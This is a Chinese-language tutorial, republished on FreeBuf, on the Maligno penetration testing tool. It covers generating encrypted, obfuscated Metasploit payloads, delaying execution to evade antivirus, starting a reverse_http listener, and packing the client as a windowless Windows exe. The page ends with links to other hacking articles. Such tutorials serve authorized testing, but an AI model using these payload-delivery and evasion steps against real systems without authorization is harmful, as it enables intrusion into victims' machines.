渗透测试工具:maligno有哪些功能?
今天我想介绍一个能够在渗透测设中帮到你的工具。Maligno是一个基于FreeBSD许可证的开源的渗透测试工具。使用Python编写,最大限度与Metasploit兼容。
它利用Metasploit framework框架,尤其是msfvenom,来生成AES加密的shellcode,并且在传输前会编码。
Maligno是非常有用的工具。它是为渗透测试设计的,但是也可以用于其它不同的场景。Maligno的通信非常灵活,可以让它仿真恶意软件的行为或通信模式。
Maligno的架构由客户端和服务端组成。Maligno各部分使用HTTP和HTTPS协议通信。
客户端和服务端可以配置成模拟特定的C&C通信,或者用作对手复制的一个部分(adversary replication,对手复制是渗透测试中的一个新概念,指用工具模拟黑客攻击,检查安全机制的有效性)。
客户端可以连接Maligno,下载加密的Metasploit载荷。当shellcode被下载下来,客户端解码和解密之后将其注入到目标机中。
客户端是David Kennedy的PyInjector的扩展版本。它支持各种操作系统,比如:Linux,Windows,以及OS X。Maligno已经具备了你需要的任何客户端和任何载荷。它有一个混淆器可在生成代码时混乱它。
Malingno另一个好功能是载荷延迟执行,规避杀软的启发式扫描。
服务端部分基于Metasploit来工作,事实上,它能够用msfvenom动态生成针对各种类型目标的载荷。它也支持多载荷和多连接。多亏Metasploit的辅助模块,它支持Socks5a代理。
如果你想在特定的IP和网络散布载荷,Maligno支持scopes。如果一个请求不在配置文件中的任何一个scops中,你可以配置“Last Resort Redirection”,这样就能禁止把载荷传送到不在scope范围内的目标上。
安装
安装非常简单,你可以直接在这里下载
解压文件,然后执行安装脚本。
复制代码
代码如下:
# ./install.sh
它会询问你创建用于SSL模式操作的证书的相关问题。
配置
在安装完成后,你可以修改服务端的配置文件,打开它,修改使用你的载荷和IP。
这里有一个配置文件的完整解释:
复制代码
代码如下:
# cat docs/server_config.explained
创建客户端脚本
复制代码
代码如下:
# ./clientgen.py -f youconfifileserver.xml -s true
这个命令为你在youconfifileserver.xml文件中配置的每个载荷生成一个Python脚本。
开启Malingo服务端
复制代码
代码如下:
# ./maligno_srv.py
Metasploit listener
现在,我们进入到Maligno文件夹里的msfresources文件夹中,执行Metasploit listener。Maligno为了快速加载,替我们为每个载荷创建了一个简单的脚本。
复制代码
代码如下:
# cd msfresources
# msfconsole -r 0_standard_reverse_http_192.168.226.139_4444.rc
现在我们把Maligno环境加载并运行起来了。
在真实场景中,我们无法欺骗用户,劝他安装运行Python脚本所需环境。我们不得不把Python脚本转换为exe。
Python脚本转为exe
在完成Maligno Python脚本创建后,为了适用于各中环境,我们不得不转化它。
我们需要下面的软件:
复制代码
代码如下:
Python 2.7 32bit for windows
Pyinstaller 2.1
PyWin32 32bit
VM Windows 7 32/64
在自己的Windows机器上安装Python2.7。从官网下载并安装它。
接下来,打开一个CMD shell,进入C:\Python27\里的scripts目录。
复制代码
代码如下:
C:\Python27\Scripts\pip.exe install pyinstaller
或者,如果你在Windows的环境变量中安装了Python的路径。
复制代码
代码如下:
C:\pip.exe install pyinstaller
下载最新版本的Pyinstaller,下载后会自动安装。
现在该安装PyWin32了。在这之前,如果你选择msi installer,你只需点击netx直到结束。默认配置是正确的,它会从windows的环境变量中找到Python的安装路径。
为了在下载阶段能够解密载荷,安装crypto模块很重要。
复制代码
代码如下:
C:\easy_install.exe crypto
C:\easy_install.exe pycrypto
现在我们准备利用Python脚本创建我们的exe
打开Linux攻击机(我们在那里创建了Maligno服务端),然后选择一个脚本,拷贝并粘贴到Windwos虚拟机中你指定的文件夹。
进入那个文件夹,并执行pyinstaller
复制代码
代码如下:
C:\pyinstaller.exe -F -w --onefile 0_standard_reverse_http.py
如果没有错误,pyinstaller创建一个名为dist的文件夹,到里面我们就能找到.exe文件,可以使用它测试你的载荷。
资源:
Malingo v2.2由Encripto发布,可以在下面的地址中免费下载。
https://www.encripto.no/nb/downloads/tools/
https://www.encripto.no
* 翻译自resources.infosecinstitute,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)
rar.exe有什么用?上传rar.exe可以快速下载su目录文件
你想一下,如果su目录文件这么多,难道你要一个个的下载??这明显就很麻烦,有了rar exe一切变的简单了!好了现在来介绍它的用法吧!得到了Webshell后,最好自己传一个rar exe,虽然program files目录有,但是
详情2018-01-12 13:31:18责编:llp 来源:驱动管家你知道流氓软件的代码是怎么样的吗?流氓软件的代码介绍
ps:请勿用于非法用途,仅供技术研究之用。by:yunshu这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代
详情2018-01-16 15:59:54责编:llp 来源:驱动管家怎么获取ip地址?如何防范ip地址泄露?
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如
详情2018-01-13 18:10:20责编:llp 来源:驱动管家如何利用fck编辑器漏洞爆路径?
哈哈 夜猫纸 有木有!!!这编辑器漏洞该有的论坛也有了 也没啥好写的了 这个爆路径也不知道大家遇没遇到过。。刚发现这东东 不敢私用 搬上来分享。如题 爆路径的问题。 原理应该跟其他的爆路径差不多
详情2018-01-17 18:58:33责编:llp 来源:驱动管家杀毒软件是怎么被破坏的?破坏杀毒软件的方法
最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今的病毒过于厉害,还是杀毒软件的能力有限?今天我们就通过实例来看看是
详情2018-01-10 10:48:06责编:llp 来源:驱动管家面向目标ip发起ddos攻击的木马工具
DDoS攻击通过大量合法的请求占用大量网络资源,以达到瘫痪网络的目的,词文章主要是针对那些对一种被大量肉鸡使用,面向目标IP发起DDoS攻击的木马工具。本篇文章是对一种被大量肉鸡使用,面向目标IP发起DDoS攻击
详情2018-01-04 11:13:04责编:llp 来源:驱动管家手机停机也可以上网?手机免费上网攻略
手机停机一样可以无限量免费上网现在向大家透露一个如何激活已停机卡的方法!?激活了以后就可以免费上网了。注:《本人动感地带的卡已测,通过》!首先,准备一张已经欠费停机的卡。注意重点:《1、需要知道卡的
详情2018-01-09 15:11:13责编:llp 来源:驱动管家- 详情2018-01-11 12:05:32责编:llp 来源:驱动管家
如何进行qq密保设置?qq密保令牌不能使用怎么办?
腾讯公司在2009年5月7日上午9点推出全新的QQ安全中心,特别推出密保令牌服务。密保令牌是二代密保其中的一个密保手段,需要安装在手机上,可以显示6位动态密码。当您成功绑定密保令牌后,令牌将会出现在“统一安
详情2018-01-17 12:20:54责编:llp 来源:驱动管家加密文件系统efs怎么加密文件?efs怎么解密?
经常看到对文件和文件夹加密的文章,大多是安装各种软件来实现的,如果你的系统是WinXP Win2003 2000,就没有必要如此兴师动众地加密了,既不需要你安装软件,也不需要繁琐的操作,因为Windows本身就集成了EFS(En
详情2018-01-11 13:35:09责编:llp 来源:驱动管家
- 万能多媒体播放软件:暴风影音的视频程序模块有漏洞
- 手机淘宝的指纹支付在哪儿打开?手机淘宝指纹支付功能
- 利用DV摄像机拍摄视频时应该注意哪些问题?
- 硬盘光驱跳线可以用这些方法来设置
- 电脑为什么要加内存条呢?内存条的作用是什么
- 【游戏攻略】《绝地求生》中最鸡肋的五件装备 别舍不得丢掉
- 【游戏攻略】《绝地求生》沙漠地图打野心得分享 这种房屋肥得流油了
- 【游戏资讯】《绝地求生》黑夜模式疑似曝光 夜视镜手电筒一应俱全
- 【游戏攻略】新手玩家如何提升对枪胜算?《绝地求生》单排对枪技巧
- 文件修复方法:hosts文件异常怎么修复
- 电脑的无线鼠标突然用不了了有什么方法解决
- iphone5s升级ios9好吗?用户亲测iphone5s升级ios9体验
- 学会金立m6虚拟定位的使用教程,让你想去哪就去哪!
- 电脑开机黑屏故障怎么排查?电脑开机黑屏怎么排查故障?
- dns设置有哪些方法?设置 dns怎么操作?
- 内网安全的技术发展历程 内网安全的数据加密技术
- 数字签名有哪些过程?数字签名的原理是什么?
- premiere可以做出老电影的视觉效果吗?premiere特效技巧
- 百度贴吧头像在哪儿设置?百度贴吧头像怎么设置?
- 手机备份软件都有哪些?那个更好用